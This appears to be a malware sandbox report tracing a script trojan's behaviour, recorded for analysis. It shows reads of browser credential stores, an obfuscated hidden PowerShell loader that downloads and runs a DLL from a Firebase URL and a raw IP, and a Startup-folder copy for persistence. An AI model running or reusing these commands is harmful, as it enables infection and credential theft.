
NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0493f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04980000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04981000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04982000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04983000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2356
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04984000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data
file C:\Users\test22\AppData\Local\MapleStudio\ChromePlus\User Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
cmdline "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
cmdline cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"
cmdline powershell -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
cmdline cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
cmdline powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
filepath: cmd.exe
1 1 0

CreateProcessInternalW

thread_identifier: 2636
thread_handle: 0x000002a8
process_identifier: 2632
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000304
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 2832
thread_handle: 0x0000044c
process_identifier: 2828
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Symantec ISB.Downloader!gen285
Kaspersky HEUR:Trojan.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received W
Data received Se `0_ jGCºÄ¿7ûCFµ9 DOWNGRD 珆%w¦LsÞ·µá[l²ÙTÄWo¦b"é>ûvÔÀ ÿ 
Data received '
Data received ’
Data received ŽA±c싣f3ۃ¥iނ]$øãB¸›Ñ­ .˜F2øëö| ;òþxn+Ľ8 r<T·ÉÏ$;‚½éG0E!’1Æ Ùðs#š8OÒìÔ ý[ɲníÏ ;¼«»Ì 9iù?E®×רøò"îœê܏Yâs¯6Iº@_Íã8
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received SüòíþéQ¿=Š'< š šâ¯¥'îÆ*›Èg#Öá@ñ5®
Data received p
Data received “®ÌEcÑqß=’À]ž£¸Kc0Z!?ÈåvNâ³ï*Ÿ]⩙ð_õˆ­\hˆYe9¿ð–¦´o¬ŽSÔ,Ë刵Æoiß<²|ƒ‚æmLŽó£òãL®* #56q<ä}?,E‘EÙ>)(ךO›¶EB 昽蜀ȋ’U ŒÂ`¨1&±²båi}aèb*a(Zzh1}´‘0飅ښRÒAj(Ê ŸH¾³ir1 ?"ë= «€0xÄÊ^5Ƅ¼#$ôBUrÙoÇÄ#ý’]¿t ¢^/<7‰R¸ÖJx>çç3SñŸE5P÷ o×<6þaDnMáìè~ð†_!A0 EÔdõ™ìDéöøޟ™aj „ì:s Ÿ }mu€G€XBo%DATšÙ5™Bn±´„ŽÝò ;ތC2{èI"Ô¾µIæŒ ík£êÔÚ$€Öï.v—*ÍÈIU˜Q´]d4ÑÊé O³áa ›8]í°,KN{lQ0ŠÄAؐ©…@<ÅQ`¤gTŸtËK6áe ­ÂhHMÄ?[Ϟ¡D·¨[’²÷¬2“¸¹;1`±³tù‚M=køÑ,άm/ VjöÙ 2i-p’p÷,ÌeLŽgŸUv/ØÄù‰ç•àËÄøð »IHäáÚ3™:,.”ÐÙ¨sáN+ÂÎÿEÀ|SÅúîÃã»WpÅiºFBЙŽr»aiÔ¸ÌÚԗ› ½ã­™pª %5$Oøà®O{¶²9¹¥²ÉÐ<Lyí‡ïÝ6KùkZ×t}T^ïß²År ai¢(ÿ®š£ëþÒîüœUš>'s=œ¼Ã¼íZãVÐ#1¥ôÎÙôß\wÒkmešÑCH%[þ </Ò¬Geëÿ?^§“µÏ7LJm ÜE®®ÀǓê{ÈIÆáH£(¼û<Íùjˈߎ;"âÈóxR½DÔifÞôYDè¸q¾}æRD_–U6‚Ô g—2qB®×ă“ùÙ. ˜I'ÍMÿ.HN®Ú›>AYÏfÙ¬.U(a;·¶²œ‘2Šx€r,þ ÀÑe <¨†l¬ÀJ‡àZ7]}õdhŸÃҕDf”rPáTŸÁ9Ös$ñžRL ]ÎwÊZI>|!ÿŸ‡<ìe¬*›1þ(¼9ôñ½1} ɃX0×xì%Aí±Üm;ª<ƒïh%1FA>a…R–»_K>‚Œh1@ˆËf®yî·À ‹@åÏ+äžJ‚Lqïž ?qˆiEÚÇ2év2ý½UŽ·‡-§€k"¼åùŠlŸH53ÄKk°$†o“v2Aò˜·Fû܁&£ øõeج¶zÐj$§j“q–sà«Ý u$ ,{v< ¸þ·Vu}GU„vZeÈb”8Ly©Òòèæîqß{þbVÃ-¹„øÏ!¾GqüÕ.iÍ£œðI„ÂT M?¨Bóï0–걆”!AF¨Ðµ²:H4>­V6â§Cçì>Œ—¾9YÙâ æðá™ha蜘ßìeEJúÌs€wóËl%ÐÕ¼RøzFüÕì]#·Dø¡¦Búü¸@ëßä- ìFj[·‰0‘h1BÅÂIÔ\w‡½:xÇÊŠ´5tª€{o‰ÐÛ)MÈ?7¨lXæf.Óì÷\¬Ë2¨Äõ‘$RæÿQ÷V³–„¦®Ý¶ª(¨©[¤cȖê{7Ö2¼ºêº±ägÀBªf·yUÕ0*ü*0Úé™w²zxu,á$ûn ÏaÞG
Data received D/ä\ °¦Õ¡òrÓ>†¯LþNŸ‡k`‚ƒØ ›RÆ¥ÝÈ µná²ð܊r ÐA>RL[Þu8(ÇÈ2¸$ Ì%Ýø êÒ±ÿJe× ÖϲÇ‚|£ÓäNÃæÛw¾ö»j1C’ø#Æ¡T5~¼Ü"¤ý D+«]+Ã5(i¼ ^.Z&?­®¸$‚O‰ :†›Ñ“S¬*²-?÷‘iÕ ùñ˜¿@ŠÎ•Ü}°&fºG]ó3ØIÇàN5Xà ²±ŒœÇæöyO˙vΕgii’?öÿýkQÓ¶½Y¢>"nœ"Ð"¶¬ð¬àßüÞ#§jv~>›¢¸køñ’JµSÈ?ºÁ"êŒfôJ¯B1 %–M¥8/›³JGŽL¨?9¢úZ—_9÷¬9è$N¢ë<œ0IJÃZÿVMhi²°D^’qΠ½3À4î€@áL‚“×å :Ï+ Æûzþ„Ëô¾ªzsbïÄ•`6µPÍl^Õ.|3¬‚©>ö%:]ö)N”x4ì֍C95ÎjË?eŽ†6\÷”¼ÿÿïyïm÷ŒYãw’ĝd-ͼ¡éËDÀOh¢u¿¡°ÜéY}óMÏõŽåû½óý8lÅÕSg™í‹˜Uä}ñ3úd<Ö¯Š¼Gçy Pª™aÝ+s%R„Kb'¸>ÜÜUd v³&ì'ÄҎ.p¯ Š·áéHÒIŸz|è!xOÈd:^Á‡¦1,ÏÀšIÔ^<\5Ì䡼{¾Qz}ú‘ôûU§c ý ø7a-¤)‡y?Jvé¦ïh‚·²ï}ràVËøí4•‰ÏÑ/HÚêOƒƒ /q ÖÒC» kµ¦œÔK§f¢þ ¢ Y^,Nӏ=Rì}Å&zì,û å¿Ñ½¤~odrƜ<ð²Ô#"£•-¼iÆeÈ+–±bQÙZŽÞýgL,Õ¿]Hðˆ¶@®TÕ¯{迱§& ×{ß$e‘[“(ðjXPï®ñyt¯Ù¡hc¤í$?T›´€ï®Pú߅@…"ÙÿmwV³7Él›ó=lŽOW)³ÐE^“ÌÓÞÁö.³m­$ÚßÖC gʨŽT˜Ls¹JO–í=lʦIdó'z j"J:Ž‰äyR¥¢cB‡Ôç±ü¡íEڎ·.f©Åin½ïÈt4t±¶µÄÅWDKҋ}Í¥Žy>׿Ç`àEÒR|vìèbCܖ¶³,„ÊP¢8Š ­Zs#«ÿç¤*¿Ê*ÉwLý*rW4'Þ»«EÜ»~7š.x‹1r(ª£è?µŽÉìoï·x´ØºîNiåçý(ë;z 9!’:±þƨ+á-·¿¥æè@éÿAW°-ÿãÎæɛùZ´fuÂ4ó”úb‡%Á<©I§”D±›ÇMœ¸KYû@ãOáqDtˆNü®‰ìÔñvÆÚðbÚƜ£D= cü©&ÝG‹„(—ÙÏ=çUZøí†ÿx¼Çýò ¬8«ÅQagÌÈÈ泬²'n ioÁ(=SE 25Ì ø~Á— lØn$“6Ç9ÚÔ\É:áNCö½ï,±þýèɱ+x1µ˜œ@§{'Õ#Š_⹁Dê©+U'™£ß“ $_Fz’u]N4¼ã´¬IçϘ>YówûjZâ<Øpþ˜ëËIV‡À>þÑ?eæ™°eµ@ö wúrÁ!‹C=̛Ú{µIQ«ÞŒt.|¾[Hhãkg~¯},.>¼¬­>x«ûÁÙfy”Äɬ¾’ÔŽì(µì™«ÊJú¶ƒRíŒ8
Data received Î$hKò*<ó …S·GŒñ÷òà T¬^+¢&ý^6˜ ;«õPšlF!ÄH%u%5ê»ÑÃéiT¸ +†ù~DZ9 ó/l})¬±Ø0†—Œ`ÐÔ¶»ûS›ë_Œˆ¶”‡ÿ;œÆë0a-…¿bVë`N0±­F Œ–ôN ‰ëÿ{JoÙnZÁÃRb¢Ü†Xïz©xÖ]N°É^sÚ@Â~ÁØ+ÓÆ0²z͊ø*ÁÿZbm³ç$¾p¥ o+xÍ´C\~Ïö{ÀvOԝSï¿=z‡ëñOa#×q‹ó@¨Ö?^ȌГLß+[íUP¢ù“p2:…‡U«C¢ý…a .¨Çº[×ó8m6Ð×óôrk+!µ<à#°«æ¼™¨ŠI«’"Õ49›sŠ0sI‹ÀTÙVÌ0¨8kS㺥¼g«\N™Iìõ¿K´'%Œ]ý5^õÒOÜÑD{LnV4V[‰Dùü.Ž1©bj×nÀùd„/ĨJhhR±ähø,vŸüº¿AïŒ(5o2DÃ÷ ø¸Ôì"ÍxXó!”òZ¯ùéPŖØÏs‰1à5¯XÏ¬âyô.¿Ø{ôÔ9+ˆ«=cµBI&qû0Lœ†Ï̞ùٟ;¡Ø¨æÌ=®¢üš²‹Û¡~% “I ‚S5…¹lNþP£uu£’6¯<݁þš­Í ¾"¾Çû.;ü:HšhÆB Lh­"a¼„8ðGÿ#+5ó ÝÕp|üK\-ě#Ø<ãýþ”¨«$m? Óæñ`Ü:G7ô «å;ýÁÚLíÌb'â~ö(VÅjKÚy¨œV*²;X¹,D%˜®œé»£Y»§ã¿*W…Àc¾¬ Ñ‹`ecÏÇË_Üé=4_=Œß×j+QP` KxGãy <b¥Ìî®`¨ª¼‚ŠûšÌW²@yÝeÓM둒ó*ÑYãm‡hfɽå±µ¢åŽÕµ§î<Ö£^ál8Û¤%aìr¾x ’êêœ.Ãë]UiL)¸*Lù¿VÓô¢8í¯:g¦Ð‰AlN] ';+ܞ’çiSz èšM*^ÕLJ$J“gBî ~…†èdt+ Þ軺^GºËÖµ‘ßä·®ñºz}â;Ù×+¢÷º «ÉÁþ2‹`ì£ÇO”?ýpçèB•‡äA¢StŒø!´w‡í1•.«²‘á§oÁ8Ž Ë5$†bq› ÍI&›ÿ\ ÃÃaÑ}AC‚`Æ_†vRïªAyBâ%ÿܘꈪæU¦^ê|D1H·1ÒìðyÖ¥Jh&7ÕëªÄ#’®›–éwN·ãü÷ j—+“Cãa˜ÕPn>Õó‚®¾¬‹±¢Ók¥AØÙތ1´¬¡W÷÷lÀ‡H„ŸÌû¿ã÷“/³ÞŠ6ٓЦêE‹£¾9¼s.ËösŠ'¥xvê.e¶§„Vá*°=IÆ\Ü¥h*P,.Ÿ—˜5x*N,Ÿ•‘Ãð˜ÅbìG‹¾æWµMaÂõ×Ð1¤Žº!óÿa¨xµxâ]º…ŽÕ… É´Õý+ B;G|>²í O4«Þʀ#Â|¹•-R.R–¶ÝL6‘y\R°~Ë ®ÀðÇOï×\¨Ýœ¶Ln©‰—ž¡ƒžVã¢ñWªé|ƒ½u€ÎoY¿eZ!*­o ï(C½´ÎWuilÑ·í)I„Ÿ®°Þ„ô-``|§œŒÚSqúÒxp~/$%¨9º»³i²d†r ³·ã.•×reÑÂm€¯×?^0Ȑh
Data received ¾".mPm˜šÁ¥Á2±Äë]ǽþÈw7(º‡ †ž?:-r&Ó|Iäªä¤ãìãmF{ÏøÏ˺ßLò} ÿ惂lë¢ "ůÌäŒøÀ©ë¸°Rc ¢õ–Ãið¯!šš;™äu—?ô!¸´÷?؛†ß˱†Níyàcÿæ>ùys4%0d´PS$) Bh9œ¿u)jÁ:G«Zéþô”v´ÅÑ×hîœX7Bðæ'—êªÍ‚Ÿ‰$¨šۊk.E\X©Ð]ìégd'i|ã崏.ß3p¥¯ãöv@݀ç™Äùuƒ'V§—Lììΐ* ‡"vµ(§Nø¸Äq2•TÕåoNóÆǖÒK íAåº`åssXN ù]vDÙPZ¾e Y%Çé&;å´kC@ò‰NO ³M£vEæz0ó̶$ˆÑ |AŽIÂÐXÁÚSÖj×5|^ï4ì«DûZûÚú®&÷S} ûüŠ*õ`V-÷(JŽÉ¡›5äw^~RQ åd¢„£ñX¢cjÂ7å(xêJª¹+òaJÌé¸h\ÿ Ëhn¯”®Sh…yÓõy ‹1x MR=,d§®DÿC¯1!6>àÿŒ¬ÒRXšbíÕ¬ý[!ä¤+OÙ|¦·â÷ ð0ySÿË4ü¥Îcnqæ¹ žÞóÞ¾_|ó‰Á¯Ž9³‚7™öK LãŽÔì¢j0 î½ñ6Ӑ‡Mòšö9jú¼s .”:Í¢€Þþ_éeï9Á?r¼­­Il|¼\—8&$bHÈ$ÁÔ÷ʕ{µëÓy¯½­ìwI~j 8Íóפ̖ é’ÂѱÉxL$!MlEöÏDE3”Ü’£ñy_<uÖ®”5]åI²øž¾ÙlR×ÅÛ®jºDWŽØíõ’2Ø2-¦ÅÛñÀ¦´¾ò ËF:KL+ÿ™8ècóô1Šø™¯ÿu–çiºÎ¼ËàŽî)©g¥L…ñ,eNI{¯^P~Ÿ£½~@Ù~[Ž‰.öÄôº/¿ ÞMП³õ]mÀu܎k§céöÍyE Zí&¦P2ýgéŠä`{T‡-±µ /2z…[ºb—=<–]ã‡)>Ø@—öåèwúØÏ,–§wH?ٜ4ë@tâèø7å!ò~X”q!¹¡öÅqSi—_=XŒf§ÉH¢îkvX#±ß (9L!þ@æ&ãÿ ÿMbM)*¶£ÚCR S C«ÅØç‡èiXT*Ø\¦œßÀÙvB•oÏ=1¾91å{„˜ttn3­ñsüBùŽTÊir‹˜Øæ`„^Ý|ÿÙAe–¯ê_ùX·è+ÒLüR§ˆû (ъx»èŒ½ŠÏ/8yT‹«_ Ûv¹d+G[mRq&ç¬hÊgãƒa­!oÖJç •uZžØ³¥Rî‹nuÍÈnXoE' “4¬G­©dî í׍º·¹¾ió-¯Í¸q_ª;£þzç&ðL¸d‹C˜M£— d!÷‹1'K2pÞV øæõ>é} 